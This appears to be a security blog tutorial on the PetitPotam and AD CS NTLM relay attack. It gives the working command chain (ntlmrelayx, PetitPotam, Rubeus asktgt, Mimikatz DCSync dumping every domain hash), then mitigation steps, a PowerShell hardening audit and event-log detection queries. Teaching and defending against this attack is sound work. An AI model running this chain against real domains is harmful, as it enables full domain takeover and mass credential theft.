Domain Takeover via PetitPotam & AD CS: Relaying NTLM to Own the Enterprise + Video

Introduction

PetitPotam (CVE-2021-36942) exploits missing path validation in the MS-EFSRPC API, forcing a Domain Controller (DC) to authenticate to an attacker‑controlled machine. When combined with Active Directory Certificate Services (AD CS) Web Enrollment, an attacker can relay the coerced NTLM authentication to request a certificate for the DC itself, obtaining a Ticket Granting Ticket (TGT) and complete domain compromise – all starting from a low‑privileged domain user account.

Learning Objectives

  • Understand how PetitPotam coerces a DC’s authentication and why AD CS is a critical relay target.
  • Execute a full attack chain: NTLM relay configuration, authentication coercion, certificate capture, TGT request, and DCSync.
  • Implement detection and mitigation strategies, including NTLM disablement, Extended Protection for Authentication (EPA), and SSL hardening.

You Should Know

1. Setting Up the NTLM Relay with Impacket’s ntlmrelayx

The first step requires an attacker‑controlled machine (typically Kali Linux) to listen for incoming NTLM authentication attempts and relay them to the AD CS web enrollment endpoint. The command below targets the Certificate Authority’s (CA) Certificate Services webpage, requesting a certificate based on the `DomainController` template.

Command (Linux – Impacket):

python3 ntlmrelayx.py -t http://ca01.domain.local/certsrv/certrqus.asp -smb2support --adcs --template DomainController

Breakdown:

– `-t` – Target URL of the AD CS web enrollment form.
– `-smb2support` – Enables SMB2 protocol support for better compatibility.
– `--adcs` – Activates AD CS attack mode (requests certificates for the relayed account).
– `--template DomainController` – Specifies the certificate template; the DC template yields a certificate that can be used for Kerberos authentication.

What it does: ntlmrelayx starts an SMB and HTTP server waiting for any coerced authentication. When a DC connects, the tool forwards the NTLM handshake to the AD CS server, which issues a certificate for the DC machine account. The tool outputs the base64‑encoded certificate – the key to domain escalation.

2. Coercing Authentication Using PetitPotam

With the relay listening, use the PetitPotam script to force a Domain Controller to authenticate back to your attacking machine. PetitPotam abuses the `EfsRpcOpenFileRaw` method in the MS-EFSRPC protocol, which lacks proper path checks.

Command (Linux – PetitPotam):

python3 PetitPotam.py <Attacker_IP> <DC_IP>

Example: `python3 PetitPotam.py 192.168.1.100 192.168.1.10`

Step‑by‑step:

  1. Ensure ntlmrelayx is running on the attacker IP (e.g., 192.168.1.100).
  2. Run the PetitPotam script pointing to the attacker IP and the target DC IP.
  3. The DC will attempt an SMB or HTTP connection to the attacker, which ntlmrelayx captures and forwards to AD CS.
  4. Upon success, ntlmrelayx prints a base64 certificate – copy it immediately.

Windows alternative (using a compiled executable):

If you have a compromised Windows host, you can use `PetitPotam.exe` from an elevated command prompt:

PetitPotam.exe <Attacker_IP> <DC_IP>

3. Requesting a TGT with Rubeus (Windows)

Once you have the base64 certificate for the DC machine account (e.g., DC01$), you need to convert it into a usable Kerberos Ticket Granting Ticket (TGT). Rubeus (v2.0.2+) can perform this PKINIT request.

Command (Windows – Rubeus.exe):

.\Rubeus.exe asktgt /dc:192.168.1.10 /domain:domain.local /user:DC01$ /ptt /certificate:<Base64_Certificate>

Parameters:

– `/dc` – IP or hostname of the Domain Controller.
– `/domain` – Fully qualified domain name.
– `/user` – The machine account name of the DC (ends with $).
– `/ptt` – Pass‑the‑ticket: injects the obtained TGT into the current logon session.
– `/certificate` – The base64 string from ntlmrelayx.

What happens: Rubeus uses the certificate to authenticate as the DC machine account to the KDC, receiving a TGT for the `krbtgt` service. The `/ptt` flag loads this ticket into memory, allowing you to act as the DC.

Verification: Run `klist` to view the injected ticket. You should see a `krbtgt` ticket.

4. DCSync Attack to Dump All Hashes

With a privileged TGT (effectively a Domain Controller’s identity) in memory, use Mimikatz to perform a DCSync attack. DCSync simulates a DC requesting replication of password hashes from another DC.

Command (Windows – Mimikatz):

mimikatz # lsadump::dcsync /domain:domain.local /all /csv

Explanation:

– `lsadump::dcsync` – Mimikatz module for directory replication.
– `/domain` – Target domain.
– `/all` – Dump all user and computer account hashes.
– `/csv` – Present output in CSV format.

Result: You obtain the NTLM hash of `krbtgt` (enabling Golden Ticket attacks) and the Administrator hash (for Pass‑the‑Hash). At this point, the attacker has full domain control.

5. Mitigation & Hardening Steps

Organizations must apply layered defenses to block this chain.

Step 1 – Disable NTLM on Domain Controllers and AD CS Servers
Apply Microsoft KB5005413: set “Network security: Restrict NTLM: NTLM authentication in this domain” to “Deny all” or “Deny for domain controllers”. On AD CS servers, disable NTLM for IIS virtual directories hosting certificate enrollment.

Step 2 – Enable Extended Protection for Authentication (EPA)
On the AD CS server, open IIS Manager, select the “certsrv” application, go to “Authentication” → “Windows Authentication” → “Advanced Settings”, and set “Extended Protection” to “Accept” or “Required”.

Step 3 – Enforce SSL/TLS for AD CS Web Enrollment
Install a valid certificate on the CA web server and force HTTPS redirection. Configure the application pool to require SSL.

Step 4 – Apply Security Updates
Ensure all domain controllers are patched against CVE-2021-36942 (PetitPotam) and related NTLM relay mitigations.

Verification commands (Windows – PowerShell as admin):

# Check registry for NTLM restrictions (policy value lives under Lsa\MSV1_0; 7 = Deny all, 5 = Deny for domain servers)
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictNTLMInDomain"

# Check EPA settings on AD CS web app (tokenChecking should be Require)
Get-WebConfigurationProperty -Filter "system.webServer/security/authentication/windowsAuthentication/extendedProtection" -Name tokenChecking -PSPath "IIS:\Sites\Default Web Site\certsrv"
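An added audit script, not from the original post, that checks one AD CS web enrollment server against Steps 1 to 3 above and reports pass/fail per setting. It assumes an elevated session on the CA web server with the WebAdministration module, and the default `Default Web Site/certsrv` application path (adjust `$App` otherwise).

```powershell
Import-Module WebAdministration
$App     = 'IIS:\Sites\Default Web Site\certsrv'
$WinAuth = 'system.webServer/security/authentication/windowsAuthentication'

function Test-AdcsRelayHardening {
    # Step 1 (policy): NTLM restriction values live under Lsa\MSV1_0.
    # RestrictReceivingNTLMTraffic ("Incoming NTLM traffic"): 2 = Deny all accounts.
    # RestrictNTLMInDomain ("NTLM authentication in this domain", applied on DCs):
    # 7 = Deny all, 5 = Deny for domain servers. Other values still accept the relay.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue

    # Step 1 (IIS): providers offered by Windows Authentication on the enrollment
    # app. If NTLM is still listed, a relayed NTLM handshake has something to talk to.
    $providers = @(Get-WebConfigurationProperty -PSPath $App -Filter "$WinAuth/providers" -Name Collection | ForEach-Object { $_.value })

    # Step 2: EPA must be Require. Allow still admits clients that send no channel
    # binding token, and a relayed connection never does.
    $epa = [string](Get-WebConfiguration -PSPath $App -Filter "$WinAuth/extendedProtection").tokenChecking

    # Step 3: TLS required on the app (sslFlags contains the Ssl flag).
    $ssl = [string](Get-WebConfiguration -PSPath $App -Filter 'system.webServer/security/access').sslFlags
    $sslRequired = (($ssl -split ',\s*') -contains 'Ssl')

    [pscustomobject]@{ Check = 'Incoming NTLM denied';  Pass = ($lsa.RestrictReceivingNTLMTraffic -eq 2); Detail = "RestrictReceivingNTLMTraffic=$($lsa.RestrictReceivingNTLMTraffic)" }
    [pscustomobject]@{ Check = 'RestrictNTLMInDomain';  Pass = ($lsa.RestrictNTLMInDomain -in 5, 7);     Detail = "RestrictNTLMInDomain=$($lsa.RestrictNTLMInDomain)" }
    [pscustomobject]@{ Check = 'NTLM provider removed'; Pass = ($providers -notcontains 'NTLM');          Detail = "providers=$($providers -join ',')" }
    [pscustomobject]@{ Check = 'EPA tokenChecking';     Pass = ($epa -eq 'Require');                      Detail = "tokenChecking=$epa" }
    [pscustomobject]@{ Check = 'Require SSL';           Pass = $sslRequired;                              Detail = "sslFlags=$ssl" }
}

Test-AdcsRelayHardening | Format-Table -AutoSize
```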

6. Detection: Spotting the Attack in Logs

Monitor the following Event IDs on Domain Controllers and AD CS servers:

  • Event ID 4624 (Windows Security Log) – Anomalous network logons using NTLM from unexpected source IPs.
  • Event ID 4768 – Kerberos TGT requests for machine accounts (e.g., DC01$) from non‑DC hosts.
  • Event ID 500 (AD CS) – Certificate issued to a machine account via web enrollment; cross‑reference with requester IP.
  • Network traffic – Unusual MS-EFSRPC calls from a DC to external IPs (PetitPotam coercion).

Example log query (PowerShell with Get-WinEvent):

Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } | Where-Object { $_.Message -like "*NTLM*" -and $_.Message -like "*<Attacker_IP>*" }
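As an added example that is not part of the original post, the two functions below hunt for this chain's artefacts using the structured event fields rather than free-text matching: the first is meant to run on the AD CS web server (where the relayed NTLM logon lands), the second on a Domain Controller (where the PKINIT TGT request is logged). The DC address list and the 24-hour window are assumptions.

```powershell
# Constructed list of legitimate DC addresses (an assumption for this example).
$DcAddresses = @('192.168.1.10', '192.168.1.11', '127.0.0.1', '::1')

# Turn an event's named EventData fields into an object with one property per
# field. Kerberos events prefix IPv4 clients with "::ffff:", which is stripped.
function ConvertTo-EventFields {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $fields = @{ TimeCreated = $Event.TimeCreated }
    $xml = [xml]$Event.ToXml()
    foreach ($d in $xml.Event.EventData.Data) {
        if ($d.Name) { $fields[$d.Name] = ("$($d.'#text')" -replace '^::ffff:', '') }
    }
    return [pscustomobject]$fields
}

# 4624 on the AD CS web server: NTLM network logons (type 3) as a machine
# account ($) from a source that is not a DC. A relayed DC01$ session coming
# from the attacker host looks exactly like this.
function Find-RelayedMachineLogon([datetime]$Since) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertTo-EventFields $_ } |
        Where-Object {
            $_.LogonType -eq '3' -and $_.AuthenticationPackageName -eq 'NTLM' -and
            $_.TargetUserName -like '*$' -and $_.IpAddress -ne '-' -and
            $DcAddresses -notcontains $_.IpAddress
        } |
        Select-Object TimeCreated, TargetUserName, IpAddress, WorkstationName
}

# 4768 on a Domain Controller: TGT requests for a machine account that
# authenticated with a certificate (PreAuthType 16 = PA-PK-AS-REQ, i.e. PKINIT)
# from a host that is not a DC, which is what the Rubeus asktgt step produces.
function Find-PkinitMachineTgt([datetime]$Since) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertTo-EventFields $_ } |
        Where-Object {
            $_.TargetUserName -like '*$' -and $_.PreAuthType -eq '16' -and
            $DcAddresses -notcontains $_.IpAddress
        } |
        Select-Object TimeCreated, TargetUserName, IpAddress, CertIssuerName, CertSerialNumber
}

$since = (Get-Date).AddHours(-24)
Find-RelayedMachineLogon -Since $since | Format-Table -AutoSize
Find-PkinitMachineTgt    -Since $since | Format-Table -AutoSize
```

A hit in either list is not proof on its own; cross-reference the source address with the certificate requester recorded on the CA and with the DC's own outbound connection at the time of the coercion.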

7. Training & Certification Resources

To master AD CS attacks, PetitPotam, and NTLM relay, consider the following curated courses (URLs are illustrative):

  • Certified Red Team Operator (CRTO) – Zero‑Point Security: `https://www.zeropointsecurity.co.uk/red-team-ops`
  • Active Directory Certificate Services Attack Course – Pentester Academy: `https://www.pentesteracademy.com/activedirectorycertificateservices`
  • Impacket & Rubeus Deep Dive – Undercode Training: `https://www.undercode.com/courses/impacket-rubeus`
  • Windows Logging & Detection – SANS SEC505: `https://www.sans.org/cyber-security-courses/securing-windows-infrastructure`

What Undercode Say

  • Key Takeaway 1: PetitPotam + AD CS is a lethal combination because it turns NTLM relay into a full domain takeover without requiring any credentials – only a low‑privileged user to initiate the coercion.
  • Key Takeaway 2: Traditional network segmentation fails if AD CS web enrollment is reachable from the attacker subnet. The real fix lies in disabling NTLM and enforcing EPA + HTTPS on all certificate interfaces.

The attack chain demonstrates why NTLM remains a persistent danger in modern Windows domains. Although Microsoft has deprecated NTLM, many environments still allow it for legacy compatibility. AD CS – often deployed with default settings – becomes the perfect relay partner. Blue teams must prioritize auditing all web enrollment endpoints, monitor for anomalous MS-EFSRPC calls, and adopt “NTLM‑free” zones for critical servers. Red teams should add this chain to their playbook because it bypasses many EDR solutions that don’t inspect SMB relay traffic. The industry is moving toward Kerberos-only authentication, but until then, assume that any reachable AD CS server with NTLM enabled can be the downfall of your domain.

Prediction

This specific PetitPotam + AD CS relay technique will likely be weaponized in ransomware campaigns within the next 6‑12 months. As Microsoft pushes further NTLM deprecation (e.g., disabling NTLMv1 by default in Windows 11 24H2), attackers will shift to abusing other MS-RPC endpoints that still support NTLM. Organizations that fail to implement EPA and certificate‑based authentication for AD CS will face inevitable compromise. Expect automated scanning tools to incorporate this chain, lowering the skill barrier for opportunistic hackers. The long‑term solution is a complete transition to cloud‑native Kerberos or passwordless authentication, but on‑prem AD will remain a target for years. Mitigations must be applied today – not after the breach.

Reported By: Zlatanh Domain – Hackers Feeds